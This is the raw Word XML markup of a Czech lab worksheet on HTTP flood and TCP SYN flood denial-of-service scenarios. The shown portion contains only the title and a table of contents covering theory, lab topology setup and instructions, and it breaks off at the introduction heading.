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6E8EC" w14:textId="65A00FA8" w:rsidR="00E00C31" w:rsidRDefault="00314A13">
      <w:pPr>
        <w:spacing w:after="180" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="-288" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EF3BC1D" wp14:editId="2F791EF3">
                <wp:extent cx="1370965" cy="780948"/>
                <wp:effectExtent l="0" t="0" r="635" b="635"/>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inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="1B65AEB1" id="Group 5606" o:spid="_x0000_s1026" style="width:107.95pt;height:61.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line"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anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00931F7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69126259" w14:textId="2C3E06E3" w:rsidR="00E00C31" w:rsidRDefault="004F1A43" w:rsidP="004F1A43">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc192341151"/>
      <w:r w:rsidRPr="004F1A43">
        <w:t xml:space="preserve">Pracovní list – Scénáře na HTTP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F1A43">
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F1A43">
        <w:t xml:space="preserve"> a TCP SYN </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F1A43">
        <w:t>flood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F1A43">
        <w:t xml:space="preserve"> útoky</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="15BDD699" w14:textId="77777777" w:rsidR="0071545E" w:rsidRPr="0071545E" w:rsidRDefault="0071545E" w:rsidP="00022F94">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9C7EF6" w14:textId="155D94BC" w:rsidR="0071545E" w:rsidRPr="0071545E" w:rsidRDefault="0071545E" w:rsidP="0071545E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0071545E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Obsah</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328CC513" w14:textId="20180355" w:rsidR="00A91846" w:rsidRDefault="0071545E">
      <w:pPr>
        <w:pStyle w:val="Obsah1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc192341151" w:history="1">
        <w:r w:rsidR="00A91846" w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Pracovní list – Scénáře na HTTP flood a TCP SYN flood útoky</w:t>
        </w:r>
        <w:r w:rsidR="00A91846">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00A91846">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00A91846">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341151 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00A91846">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00A91846">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00A91846">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00A91846">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D7147F0" w14:textId="7267D032" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:pStyle w:val="Obsah2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc192341152" w:history="1">
        <w:r w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Úvod</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341152 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DE19A74" w14:textId="19AAE2CA" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:pStyle w:val="Obsah2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc192341153" w:history="1">
        <w:r w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Potřebné materiály</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341153 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32EF2CEF" w14:textId="46C9F3D4" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:pStyle w:val="Obsah1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc192341154" w:history="1">
        <w:r w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Teoretické informace</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341154 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1C9B89AB" w14:textId="46F174DD" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:pStyle w:val="Obsah2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc192341155" w:history="1">
        <w:r w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>DOS typu HTTP flood</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341155 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15FD2B7B" w14:textId="726D752F" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:pStyle w:val="Obsah2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc192341156" w:history="1">
        <w:r w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>DOS typu TCP SYN flood</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341156 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C79D6AA" w14:textId="6049FE96" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:pStyle w:val="Obsah1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc192341157" w:history="1">
        <w:r w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Instrukce</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341157 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="592D0E73" w14:textId="227843DC" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:pStyle w:val="Obsah2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc192341158" w:history="1">
        <w:r w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Část 1. Úvod k DoS</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341158 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="309031B0" w14:textId="326DFE3E" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:pStyle w:val="Obsah2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc192341159" w:history="1">
        <w:r w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Část 2. Popis topologie</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341159 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="26CEF399" w14:textId="55F1411D" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:pStyle w:val="Obsah2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc192341160" w:history="1">
        <w:r w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Část 2,5. Replikace topologie (pro přednášející)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341160 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C63F312" w14:textId="43DBEB63" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:pStyle w:val="Obsah3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc192341161" w:history="1">
        <w:r w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Krok 1. Stáhnutí a virtualizace strojů</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341161 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5170E61C" w14:textId="1BEB2A32" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:pStyle w:val="Obsah3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc192341162" w:history="1">
        <w:r w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Krok 2. Nastavení síťových karet ve VB</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341162 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7338A1A7" w14:textId="11279D7E" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:pStyle w:val="Obsah3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc192341163" w:history="1">
        <w:r w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Krok 3. Komunikace (routery)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341163 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E9E6992" w14:textId="1BD01C4B" w:rsidR="00A91846" w:rsidRDefault="00A91846">
      <w:pPr>
        <w:pStyle w:val="Obsah2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10061"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc192341164" w:history="1">
        <w:r w:rsidRPr="00913048">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Část 3.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc192341164 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1ED10615" w14:textId="7E44E113" w:rsidR="004F1A43" w:rsidRDefault="0071545E" w:rsidP="004F1A43">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DA7C4F" w14:textId="77777777" w:rsidR="004F1A43" w:rsidRDefault="004F1A43" w:rsidP="00066DC0">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc192341152"/>
      <w:r w:rsidRPr="00066DC0">
        <w:t>Úvod</w:t>
      </w:r>
